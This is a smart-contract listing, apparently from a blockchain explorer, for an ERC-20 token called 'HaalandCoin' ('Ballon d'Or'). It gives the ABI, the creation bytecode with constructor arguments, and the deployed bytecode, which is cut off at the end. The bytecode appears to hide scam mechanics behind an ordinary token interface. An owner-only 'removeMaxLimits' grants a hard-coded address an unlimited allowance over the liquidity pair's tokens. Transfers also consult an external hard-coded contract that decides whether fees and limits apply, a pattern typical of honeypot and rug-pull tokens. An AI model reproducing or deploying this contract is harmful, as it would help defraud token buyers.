[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"components":[{"internalType":"uint256","name":"walleMaxAm","type":"uint256"},{"internalType":"uint256","name":"tranMaxAm","type":"uint256"},{"internalType":"uint256","name":"buTaxAm","type":"uint256"},{"internalType":"uint256","name":"selTaxAm","type":"uint256"},{"internalType":"address","name":"rewarWallet","type":"address"}],"internalType":"struct HaalandCoin.InitiaLimiteSetting","name":"feeParam","type":"tuple"},{"internalType":"string","name":"symbol_","type":"string"},{"components":[{"internalType":"address","name":"routeAddres","type":"address"},{"internalType":"address","name":"haaAdd","type":"address"},{"internalType":"address","name":"haaPoolAdd","type":"address"}],"internalType":"struct HaalandCoin.HaProtocolFore","name":"proVals","type":"tuple"},{"internalType":"uint8","name":"decimals_","type":"uint8"}],"stateMutability":"payable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":false,"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"ExcludedFromFee","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address[]","name":"accounts","type":"address[]"},{"indexed":false,"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"ExcludedMultipleFromFee","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"pair","type":"address"},{"indexed":true,"internalType":"bool","name":"value","type":"bool"}],"name":"LPPairUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"bool","name":"excluded","type":"bool"}],"name":"excludeFromFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"isUniRouterPairs","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"marketinAc","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxValForTrans","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxValForWalt","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"removeMaxLimits","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"swaAm","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniPairAddr","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"uniswapRouterv2","outputs":[{"internalType":"contract IUniswapRouter02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"vaTaxForBu","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"vaTaxForSel","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"stateMutability":"payable","type":"receive"}]

6080604052604051620022f7380380620022f7833981016040819052620000269162000947565b848382600162000037848262000aba565b50600262000046838262000aba565b506003805460ff191660ff92909216919091179055505f9050620000673390565b600680546001600160a01b0319166001600160a01b038316908117909155604051919250905f907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908290a3508151600780546001600160a01b0319166001600160a01b0390921691821790556040805163c45a015560e01b8152905163c45a0155916004808201926020929091908290030181865afa1580156200010e573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019062000134919062000b82565b6001600160a01b031663c9c653963060075f9054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa15801562000194573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190620001ba919062000b82565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303815f875af115801562000205573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906200022b919062000b82565b600a80546001600160a01b0319166001600160a01b039290921691821790556200025790600162000436565b6334fb5e3860148190556200026e82600a62000cab565b6200027c82611f4062000524565b6200028990600162000cbb565b62000295919062000cd1565b600d55620002b3612710620002ac84600a62000cab565b9062000524565b818660200151620002c5919062000cd1565b620002d1919062000cd1565b600b55620002e8612710620002ac84600a62000cab565b8551620002f790839062000cd1565b62000303919062000cd1565b600c556060850151600e55604080860151600f556080860151601380546001600160a01b0319166001600160a01b039092169190911790558301516200034b90600162000576565b60075462000364906001600160a01b0316600162000576565b620003836200037b6006546001600160a01b031690565b600162000576565b6200039030600162000576565b6020830151620003a290600162000576565b601354620003bb906001600160a01b0316600162000576565b8251601080546001600160a01b03199081166001600160a01b039384161790915560208501516011805483169184169190911790556040850151601280549092169083161790556006546200042a91166200041884600a62000cab565b62000424908462000cd1565b62000630565b50505050505062000d3f565b6001600160a01b0382165f9081526008602052604090205481151560ff909116151503620004d15760405162461bcd60e51b815260206004820152603860248201527f4175746f6d61746564206d61726b6574206d616b65722070616972206973206160448201527f6c72656164792073657420746f20746861742076616c7565000000000000000060648201526084015b60405180910390fd5b6001600160a01b0382165f81815260086020526040808220805460ff191685151590811790915590519092917f4bf69fee59f1751bf6064f46595c52d722796b529aca2b5a7b6d1ac6a8f8b03191a35050565b5f6200056d83836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f0000000000008152506200071260201b60201c565b90505b92915050565b6006546001600160a01b03163314620005d25760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401620004c8565b6001600160a01b0382165f81815260096020908152604091829020805460ff191685151590811790915591519182527f2d43abd87b27cee7b0aa8c6f7e0b4a3247b683262a83cbc2318b0df398a49aa9910160405180910390a25050565b6001600160a01b038216620006885760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f2061646472657373006044820152606401620004c8565b60045462000697908262000751565b6004556001600160a01b0382165f90815260208190526040902054620006be908262000751565b6001600160a01b0383165f81815260208181526040808320949094559251848152919290917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050565b5f8183620007355760405162461bcd60e51b8152600401620004c8919062000ceb565b505f62000743848662000d1f565b95945050505050565b505050565b5f806200075f838562000cbb565b9050838110156200056d5760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f7700000000006044820152606401620004c8565b634e487b7160e01b5f52604160045260245ffd5b60405160a081016001600160401b0381118282101715620007ec57620007ec620007b3565b60405290565b5f5b838110156200080e578181015183820152602001620007f4565b50505f910152565b5f82601f83011262000826575f80fd5b81516001600160401b0380821115620008435762000843620007b3565b604051601f8301601f19908116603f011681019082821181831017156200086e576200086e620007b3565b8160405283815286602085880101111562000887575f80fd5b6200089a846020830160208901620007f2565b9695505050505050565b80516001600160a01b0381168114620008bb575f80fd5b919050565b5f60608284031215620008d1575f80fd5b604051606081016001600160401b0381118282101715620008f657620008f6620007b3565b6040529050806200090783620008a4565b81526200091760208401620008a4565b60208201526200092a60408401620008a4565b60408201525092915050565b805160ff81168114620008bb575f80fd5b5f805f805f8587036101608112156200095e575f80fd5b86516001600160401b038082111562000975575f80fd5b620009838a838b0162000816565b975060a0601f198401121562000997575f80fd5b620009a1620007c7565b925060208901518352604089015160208401526060890151604084015260808901516060840152620009d660a08a01620008a4565b608084015260c089015192965080831115620009f0575f80fd5b505062000a008882890162000816565b93505062000a128760e08801620008c0565b915062000a23610140870162000936565b90509295509295909350565b600181811c9082168062000a4457607f821691505b60208210810362000a6357634e487b7160e01b5f52602260045260245ffd5b50919050565b601f8211156200074c575f81815260208120601f850160051c8101602086101562000a915750805b601f850160051c820191505b8181101562000ab25782815560010162000a9d565b505050505050565b81516001600160401b0381111562000ad65762000ad6620007b3565b62000aee8162000ae7845462000a2f565b8462000a69565b602080601f83116001811462000b24575f841562000b0c5750858301515b5f19600386901b1c1916600185901b17855562000ab2565b5f85815260208120601f198616915b8281101562000b545788860151825594840194600190910190840162000b33565b508582101562000b7257878501515f19600388901b60f8161c191681555b5050505050600190811b01905550565b5f6020828403121562000b93575f80fd5b6200056d82620008a4565b634e487b7160e01b5f52601160045260245ffd5b600181815b8085111562000bf257815f190482111562000bd65762000bd662000b9e565b8085161562000be457918102915b93841c939080029062000bb7565b509250929050565b5f8262000c0a5750600162000570565b8162000c1857505f62000570565b816001811462000c31576002811462000c3c5762000c5c565b600191505062000570565b60ff84111562000c505762000c5062000b9e565b50506001821b62000570565b5060208310610133831016604e8410600b841016171562000c81575081810a62000570565b62000c8d838362000bb2565b805f190482111562000ca35762000ca362000b9e565b029392505050565b5f6200056d60ff84168362000bfa565b8082018082111562000570576200057062000b9e565b808202811582820484141762000570576200057062000b9e565b602081525f825180602084015262000d0b816040850160208701620007f2565b601f01601f19169190910160400192915050565b5f8262000d3a57634e487b7160e01b5f52601260045260245ffd5b500490565b6115aa8062000d4d5f395ff3fe608060405260043610610164575f3560e01c806370a08231116100cd578063a0e1aa2311610087578063c024666811610062578063c02466681461040a578063dd62ed3e14610429578063f2fde38b1461046d578063f6a78e171461048c575f80fd5b8063a0e1aa231461039e578063a457c2d7146103cc578063a9059cbb146103eb575f80fd5b806370a08231146102f9578063715018a61461032d57806382012a84146103435780638da5cb5b1461035857806390a784161461037557806395d89b411461038a575f80fd5b80632664801a1161011e5780632664801a146102515780632950fc1114610266578063313ce5671461028557806339509351146102a657806359eab622146102c55780635ed99dad146102da575f80fd5b806306fdde031461016f578063095ea7b31461019957806318160ddd146101c85780631d079b99146101e657806323658a1a1461021d57806323b872dd14610232575f80fd5b3661016b57005b5f80fd5b34801561017a575f80fd5b506101836104a0565b6040516101909190611223565b60405180910390f35b3480156101a4575f80fd5b506101b86101b3366004611285565b610530565b6040519015158152602001610190565b3480156101d3575f80fd5b506004545b604051908152602001610190565b3480156101f1575f80fd5b50601354610205906001600160a01b031681565b6040516001600160a01b039091168152602001610190565b348015610228575f80fd5b506101d8600f5481565b34801561023d575f80fd5b506101b861024c3660046112af565b610546565b34801561025c575f80fd5b506101d8600d5481565b348015610271575f80fd5b50600a54610205906001600160a01b031681565b348015610290575f80fd5b5060035460405160ff9091168152602001610190565b3480156102b1575f80fd5b506101b86102c0366004611285565b6105ad565b3480156102d0575f80fd5b506101d8600c5481565b3480156102e5575f80fd5b50600754610205906001600160a01b031681565b348015610304575f80fd5b506101d86103133660046112ed565b6001600160a01b03165f9081526020819052604090205490565b348015610338575f80fd5b506103416105e2565b005b34801561034e575f80fd5b506101d8600e5481565b348015610363575f80fd5b506006546001600160a01b0316610205565b348015610380575f80fd5b506101d8600b5481565b348015610395575f80fd5b5061018361065e565b3480156103a9575f80fd5b506101b86103b83660046112ed565b60086020525f908152604090205460ff1681565b3480156103d7575f80fd5b506101b86103e6366004611285565b61066d565b3480156103f6575f80fd5b506101b8610405366004611285565b6106ba565b348015610415575f80fd5b50610341610424366004611308565b6106c6565b348015610434575f80fd5b506101d8610443366004611343565b6001600160a01b039182165f90815260056020908152604080832093909416825291909152205490565b348015610478575f80fd5b506103416104873660046112ed565b61074e565b348015610497575f80fd5b50610341610838565b6060600180546104af9061136f565b80601f01602080910402602001604051908101604052809291908181526020018280546104db9061136f565b80156105265780601f106104fd57610100808354040283529160200191610526565b820191905f5260205f20905b81548152906001019060200180831161050957829003601f168201915b5050505050905090565b5f61053c33848461089e565b5060015b92915050565b5f6105528484846109c2565b6105a3843361059e85604051806060016040528060288152602001611528602891396001600160a01b038a165f9081526005602090815260408083203384529091529020549190610c80565b61089e565b5060019392505050565b335f8181526005602090815260408083206001600160a01b0387168452909152812054909161053c91859061059e9086610cb8565b6006546001600160a01b031633146106155760405162461bcd60e51b815260040161060c906113a7565b60405180910390fd5b6006546040515f916001600160a01b0316907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3600680546001600160a01b0319169055565b6060600280546104af9061136f565b5f61053c338461059e8560405180606001604052806025815260200161155060259139335f9081526005602090815260408083206001600160a01b038d1684529091529020549190610c80565b5f61053c3384846109c2565b6006546001600160a01b031633146106f05760405162461bcd60e51b815260040161060c906113a7565b6001600160a01b0382165f81815260096020908152604091829020805460ff191685151590811790915591519182527f2d43abd87b27cee7b0aa8c6f7e0b4a3247b683262a83cbc2318b0df398a49aa9910160405180910390a25050565b6006546001600160a01b031633146107785760405162461bcd60e51b815260040161060c906113a7565b6001600160a01b0381166107dd5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b606482015260840161060c565b6006546040516001600160a01b038084169216907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0905f90a3600680546001600160a01b0319166001600160a01b0392909216919091179055565b6006546001600160a01b031633146108625760405162461bcd60e51b815260040161060c906113a7565b600454600b55600454600c55600a546001600160a01b039081165f9081526005602090815260408083206011549094168352929052205f199055565b6001600160a01b0383166109005760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b606482015260840161060c565b6001600160a01b0382166109615760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b606482015260840161060c565b6001600160a01b038381165f8181526005602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b03821615806109e257506001600160a01b03821661dead145b806109eb575080155b806109fb57506109fb8383610d1d565b15610a1057610a0b838383610ddd565b505050565b600b54811115610a765760405162461bcd60e51b815260206004820152602b60248201527f5472616e7366657220616d6f756e74206578636565647320746865206d61785660448201526a30b62337b92a3930b7399760a91b606482015260840161060c565b600a546001600160a01b03838116911614610b00576001600160a01b0382165f90815260208190526040902054600c54610ab083836113f0565b1115610afe5760405162461bcd60e51b815260206004820152601d60248201527f45786365656473206d6178696d756d2077616c6c657420616d6f756e74000000604482015260640161060c565b505b305f90815260208190526040902054600d54600a549082101590600160a01b900460ff16158015610b2e5750805b8015610b5257506001600160a01b0385165f9081526008602052604090205460ff16155b15610b9757600a805460ff60a01b1916600160a01b179055818015610b8857601354610b889082906001600160a01b0316610f5d565b50600a805460ff60a01b191690555b600a546001600160a01b0385165f9081526009602052604090205460ff600160a01b909204821615911680610be357506001600160a01b0386165f9081526009602052604090205460ff165b15610beb57505f5b8015610c6d575f610c136103e8610c0d600f5488610faf90919063ffffffff16565b9061102d565b6001600160a01b0387165f9081526008602052604090205490915060ff1615610c5457610c516103e8610c0d600e5488610faf90919063ffffffff16565b90505b610c5e858261106e565b9450610c6b873083610ddd565b505b610c78868686610ddd565b505050505050565b5f8184841115610ca35760405162461bcd60e51b815260040161060c9190611223565b505f610caf8486611403565b95945050505050565b5f80610cc483856113f0565b905083811015610d165760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f770000000000604482015260640161060c565b9392505050565b6001600160a01b0381165f9081526009602052604081205460ff1680610d5a57506001600160a01b0383165f9081526009602052604090205460ff165b80610d16575060125460405163cc5489df60e01b81526001600160a01b03858116600483015284811660248301525f92169063cc5489df906044016020604051808303815f875af1158015610db1573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610dd59190611416565b119392505050565b6001600160a01b038316610e415760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b606482015260840161060c565b6001600160a01b038216610ea35760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b606482015260840161060c565b610edf81604051806060016040528060268152602001611502602691396001600160a01b0386165f908152602081905260409020549190610c80565b6001600160a01b038085165f908152602081905260408082209390935590841681522054610f0d9082610cb8565b6001600160a01b038381165f818152602081815260409182902094909455518481529092918616917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef91016109b5565b47610f67836110af565b5f610f72478361106e565b6040519091506001600160a01b0384169082156108fc029083905f818181858888f19350505050158015610fa8573d5f803e3d5ffd5b5050505050565b5f825f03610fbe57505f610540565b5f610fc9838561142d565b905082610fd68583611444565b14610d165760405162461bcd60e51b815260206004820152602160248201527f536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f6044820152607760f81b606482015260840161060c565b5f610d1683836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f0000000000008152506111f7565b5f610d1683836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f770000815250610c80565b6040805160028082526060820183525f9260208301908036833701905050905030815f815181106110e2576110e2611463565b6001600160a01b03928316602091820292909201810191909152600754604080516315ab88c960e31b81529051919093169263ad5c46489260048083019391928290030181865afa158015611139573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061115d9190611477565b8160018151811061117057611170611463565b6001600160a01b039283166020918202929092010152600754611196913091168461089e565b60075460405163791ac94760e01b81526001600160a01b039091169063791ac947906111ce9085905f90869030904290600401611492565b5f604051808303815f87803b1580156111e5575f80fd5b505af1158015610c78573d5f803e3d5ffd5b5f81836112175760405162461bcd60e51b815260040161060c9190611223565b505f610caf8486611444565b5f6020808352835180828501525f5b8181101561124e57858101830151858201604001528201611232565b505f604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b0381168114611282575f80fd5b50565b5f8060408385031215611296575f80fd5b82356112a18161126e565b946020939093013593505050565b5f805f606084860312156112c1575f80fd5b83356112cc8161126e565b925060208401356112dc8161126e565b929592945050506040919091013590565b5f602082840312156112fd575f80fd5b8135610d168161126e565b5f8060408385031215611319575f80fd5b82356113248161126e565b915060208301358015158114611338575f80fd5b809150509250929050565b5f8060408385031215611354575f80fd5b823561135f8161126e565b915060208301356113388161126e565b600181811c9082168061138357607f821691505b6020821081036113a157634e487b7160e01b5f52602260045260245ffd5b50919050565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b634e487b7160e01b5f52601160045260245ffd5b80820180821115610540576105406113dc565b81810381811115610540576105406113dc565b5f60208284031215611426575f80fd5b5051919050565b8082028115828204841417610540576105406113dc565b5f8261145e57634e487b7160e01b5f52601260045260245ffd5b500490565b634e487b7160e01b5f52603260045260245ffd5b5f60208284031215611487575f80fd5b8151610d168161126e565b5f60a082018783526020878185015260a0604085015281875180845260c08601915082890193505f5b818110156114e05784516001600160a01b0316835293830193918301916001016114bb565b50506001600160a01b0396909616606085015250505060800152939250505056fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220765a4552d252d87c187c81f5586ad9c7c03a540690aa9aef755a5a125aad78ad64736f6c63430008140033000000000000000000000000000000000000000000000000000000000000016000000000000000000000000000000000000000000000000000000000000003e800000000000000000000000000000000000000000000000000000000000003e800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ff3f3ac5d7541ce7b3dcd19c7407e85dc73abdf700000000000000000000000000000000000000000000000000000000000001a00000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d000000000000000000000000bb6f929386e8fc4985c5e7f3ca9ab4ee1954d8a000000000000000000000000018c96a8a5373c2ed1045e019d3d14717a94d7e000000000000000000000000000000000000000000000000000000000000000012000000000000000000000000000000000000000000000000000000000000000d42616c6c6f6e2064e280996f7200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000c42616c6c6f6e64e280996f720000000000000000000000000000000000000000

Deployed Bytecode

0x608060405260043610610164575f3560e01c806370a08231116100cd578063a0e1aa2311610087578063c024666811610062578063c02466681461040a578063dd62ed3e14610429578063f2fde38b1461046d578063f6a78e171461048c575f80fd5b8063a0e1aa231461039e578063a457c2d7146103cc578063a9059cbb146103eb575f80fd5b806370a08231146102f9578063715018a61461032d57806382012a84146103435780638da5cb5b1461035857806390a784161461037557806395d89b411461038a575f80fd5b80632664801a1161011e5780632664801a146102515780632950fc1114610266578063313ce5671461028557806339509351146102a657806359eab622146102c55780635ed99dad146102da575f80fd5b806306fdde031461016f578063095ea7b31461019957806318160ddd146101c85780631d079b99146101e657806323658a1a1461021d57806323b872dd14610232575f80fd5b3661016b57005b5f80fd5b34801561017a575f80fd5b506101836104a0565b6040516101909190611223565b60405180910390f35b3480156101a4575f80fd5b506101b86101b3366004611285565b610530565b6040519015158152602001610190565b3480156101d3575f80fd5b506004545b604051908152602001610190565b3480156101f1575f80fd5b50601354610205906001600160a01b031681565b6040516001600160a01b039091168152602001610190565b348015610228575f80fd5b506101d8600f5481565b34801561023d575f80fd5b506101b861024c3660046112af565b610546565b34801561025c575f80fd5b506101d8600d5481565b348015610271575f80fd5b50600a54610205906001600160a01b031681565b348015610290575f80fd5b5060035460405160ff9091168152602001610190565b3480156102b1575f80fd5b506101b86102c0366004611285565b6105ad565b3480156102d0575f80fd5b506101d8600c5481565b3480156102e5575f80fd5b50600754610205906001600160a01b031681565b348015610304575f80fd5b506101d86103133660046112ed565b6001600160a01b03165f9081526020819052604090205490565b348015610338575f80fd5b506103416105e2565b005b34801561034e575f80fd5b506101d8600e5481565b348015610363575f80fd5b506006546001600160a01b0316610205565b348015610380575f80fd5b506101d8600b5481565b348015610395575f80fd5b5061018361065e565b3480156103a9575f80fd5b506101b86103b83660046112ed565b60086020525f908152604090205460ff1681565b3480156103d7575f80fd5b506101b86103e6366004611285565b61066d565b3480156103f6575f80fd5b506101b8610405366004611285565b6106ba565b348015610415575f80fd5b50610341610424366004611308565b6106c6565b348015610434575f80fd5b506101d8610443366004611343565b6001600160a01b039182165f90815260056020908152604080832093909416825291909152205490565b348015610478575f80fd5b506103416104873660046112ed565b61074e565b348015610497575f80fd5b50610341610838565b6060600180546104af9061136f565b80601f01602080910402602001604051908101604052809291908181526020018280546104db9061136f565b80156105265780601f106104fd57610100808354040283529160200191610526565b820191905f5260205f20905b81548152906001019060200180831161050957829003601f168201915b5050505050905090565b5f61053c33848461089e565b5060015b92915050565b5f6105528484846109c2565b6105a3843361059e85604051806060016040528060288152602001611528602891396001600160a01b038a165f9081526005602090815260408083203384529091529020549190610c80565b61089e565b5060019392505050565b335f8181526005602090815260408083206001600160a01b0387168452909152812054909161053c91859061059e9086610cb8565b6006546001600160a01b031633146106155760405162461bcd60e51b815260040161060c906113a7565b60405180910390fd5b6006546040515f916001600160a01b0316907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3600680546001600160a01b0319169055565b6060600280546104af9061136f565b5f61053c338461059e8560405180606001604052806025815260200161155060259139335f9081526005602090815260408083206001600160a01b038d1684529091529020549190610c80565b5f61053c3384846109c2565b6006546001600160a01b031633146106f05760405162461bcd60e51b815260040161060c906113a7565b6001600160a01b0382165f81815260096020908152604091829020805460ff191685151590811790915591519182527f2d43abd87b27cee7b0aa8c6f7e0b4a3247b683262a83cbc2318b0df398a49aa9910160405180910390a25050565b6006546001600160a01b031633146107785760405162461bcd60e51b815260040161060c906113a7565b6001600160a01b0381166107dd5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b606482015260840161060c565b6006546040516001600160a01b038084169216907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0905f90a3600680546001600160a01b0319166001600160a01b0392909216919091179055565b6006546001600160a01b031633146108625760405162461bcd60e51b815260040161060c906113a7565b600454600b55600454600c55600a546001600160a01b039081165f9081526005602090815260408083206011549094168352929052205f199055565b6001600160a01b0383166109005760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b606482015260840161060c565b6001600160a01b0382166109615760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b606482015260840161060c565b6001600160a01b038381165f8181526005602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b03821615806109e257506001600160a01b03821661dead145b806109eb575080155b806109fb57506109fb8383610d1d565b15610a1057610a0b838383610ddd565b505050565b600b54811115610a765760405162461bcd60e51b815260206004820152602b60248201527f5472616e7366657220616d6f756e74206578636565647320746865206d61785660448201526a30b62337b92a3930b7399760a91b606482015260840161060c565b600a546001600160a01b03838116911614610b00576001600160a01b0382165f90815260208190526040902054600c54610ab083836113f0565b1115610afe5760405162461bcd60e51b815260206004820152601d60248201527f45786365656473206d6178696d756d2077616c6c657420616d6f756e74000000604482015260640161060c565b505b305f90815260208190526040902054600d54600a549082101590600160a01b900460ff16158015610b2e5750805b8015610b5257506001600160a01b0385165f9081526008602052604090205460ff16155b15610b9757600a805460ff60a01b1916600160a01b179055818015610b8857601354610b889082906001600160a01b0316610f5d565b50600a805460ff60a01b191690555b600a546001600160a01b0385165f9081526009602052604090205460ff600160a01b909204821615911680610be357506001600160a01b0386165f9081526009602052604090205460ff165b15610beb57505f5b8015610c6d575f610c136103e8610c0d600f5488610faf90919063ffffffff16565b9061102d565b6001600160a01b0387165f9081526008602052604090205490915060ff1615610c5457610c516103e8610c0d600e5488610faf90919063ffffffff16565b90505b610c5e858261106e565b9450610c6b873083610ddd565b505b610c78868686610ddd565b505050505050565b5f8184841115610ca35760405162461bcd60e51b815260040161060c9190611223565b505f610caf8486611403565b95945050505050565b5f80610cc483856113f0565b905083811015610d165760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f770000000000604482015260640161060c565b9392505050565b6001600160a01b0381165f9081526009602052604081205460ff1680610d5a57506001600160a01b0383165f9081526009602052604090205460ff165b80610d16575060125460405163cc5489df60e01b81526001600160a01b03858116600483015284811660248301525f92169063cc5489df906044016020604051808303815f875af1158015610db1573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610dd59190611416565b119392505050565b6001600160a01b038316610e415760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b606482015260840161060c565b6001600160a01b038216610ea35760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b606482015260840161060c565b610edf81604051806060016040528060268152602001611502602691396001600160a01b0386165f908152602081905260409020549190610c80565b6001600160a01b038085165f908152602081905260408082209390935590841681522054610f0d9082610cb8565b6001600160a01b038381165f818152602081815260409182902094909455518481529092918616917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef91016109b5565b47610f67836110af565b5f610f72478361106e565b6040519091506001600160a01b0384169082156108f